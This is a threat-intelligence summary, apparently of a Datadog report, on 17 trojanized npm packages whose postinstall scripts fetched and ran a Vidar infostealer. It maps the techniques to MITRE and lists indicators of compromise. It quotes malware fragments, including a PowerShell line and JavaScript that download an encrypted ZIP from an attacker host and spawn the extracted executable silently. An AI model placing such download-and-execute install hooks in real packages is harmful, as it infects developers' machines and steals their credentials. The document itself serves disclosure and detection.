Datadog Security Research discovered 17 malicious npm packages (23 releases) that used postinstall scripts to download and execute a Vidar infostealer payload on Windows systems, attributed to threat cluster MUT-4831. The campaign abused freshly created npm accounts to publish SDK-like packages masquerading as benign libraries and used download URLs such as upload.bullethost.cloud to fetch encrypted ZIP archives containing bridle.exe. #Vidar #MUT-4831
Keypoints
- Datadog detected 17 npm packages (23 releases) delivering downloader malware via postinstall scripts that target Windows systems.
- The malicious packages masqueraded as legitimate SDKs (Telegram bot helpers, icon libs, forks of Cursor/React) to increase trust and installs.
- GuardDog flagged indicators including suspicious URLs, silent execution (spawn detached stdio ignore), and npm postinstall execution of src/dependencies.js.
- The postinstall scripts downloaded encrypted ZIP archives from domains like upload.bullethost.cloud, extracted them with a hardcoded password, and executed a PE named bridle.exe.
- bridle.exe was identified by SHA-256 as a Vidar infostealer variant (Vidar v2 compiled in Go) that collects credentials, wallets, cookies and exfiltrates via social-media-based C2 channels.
- The campaign was attributed to threat activity cluster MUT-4831; publisher accounts (aartje, saliii229911) were recently created and subsequently banned with packages removed.
- Packages remained live for ~two weeks, had at least 2,240 downloads (react-icon-pkg peaked at 503), and Datadog published the malicious package dataset for research and SCA queries for detection.
MITRE Techniques
- [T1059 ] Command and scripting interpreter – postinstall scripts and embedded PowerShell were used to download and run code during package installation (“The package.json has a script automatically running when the package is installed … ‘postinstall’: ‘node src/dependencies.js’”; PowerShell: “iwr ‘https://upload.bullethost[.]cloud/download/68f5503834645ddd64ba3e17’ -OutFile $env:TEMPbLtjqzUn.zip”).
- [T1105 ] Ingress Tool Transfer – the postinstall scripts download encrypted ZIP archives from remote URLs to the victim TEMP directory (“const downloadUrl = ‘https://upload.bullethost[.]cloud/download/68f55d7834645ddd64ba3e3e’; … await downloadFile(downloadUrl, zipPath);”).
- [T1047 ] Windows Management Instrumentation and Execution – executed a downloaded PE binary (.exe) from the extracted archive using a spawned detached process (“var child = spawn(exePath, [], { detached: true, stdio: ‘ignore’ });” and “await executeExe(extractPath);”).
- [T1555 ] Credentials from Web Browsers (data from local sources) – Vidar infostealer collects browser credentials and cookies as part of its data theft capabilities (“Vidar collects sensitive data, including browser credentials, cookies, cryptocurrency wallets, and system files”).
- [T1078 ] Valid Accounts (C2 discovery via public accounts) – malware uses hardcoded Telegram and Steam profiles to discover active C2 infrastructure (“the executable thus first calls home to the Telegram and Steam profiles to discover which second-order C2 infrastructure is currently active”).
- [T1027 ] Obfuscated Files or Information – use of encrypted ZIP archives with hardcoded passwords to hide the payload (“Download an encrypted ZIP archive … Decrypt and extract the archive, using the same hardcoded string for the ZIP file name and decompression password”).
- [T1486 ] Data Encrypted for Impact / Data Destruction (cleanup) – Vidar deletes traces after exfiltration to hinder detection and response (“Upon successful data exfiltration, the malware deletes all traces of itself from the victim system”).
Indicators of Compromise
- [Domain ] download hosting and C2 – upload.bullethost.cloud/download/68f55d7834645ddd64ba3e3e, upload.bullethost.cloud/download/68f5503834645ddd64ba3e17
- [File name ] archived payload – bLtjqzUn.zip (contains bridle.exe)
- [File name / binary ] malware executable – bridle.exe (Vidar variant, single PE across samples)
- [Domains ] Vidar C2 infrastructure examples – gra.khabeir[.]com, a.t.rizbegadget[.]shop (and multiple other C2 domains listed: cvt.technicalprorj[.]xyz, ftp.nadimgadget[.]shop, etc.)
- [Profiles / URLs ] social-media C2 discovery – https://telegram[.]me/s/sre22qe (Telegram profile), https://steamcommunity[.]com/profiles/76561198777118079 (Steam profile)
- [Account names ] npm publishers tied to campaign – aartje, saliii229911 (accounts that published the malicious packages)
Read more: https://securitylabs.datadoghq.com/articles/mut-4831-trojanized-npm-packages-vidar/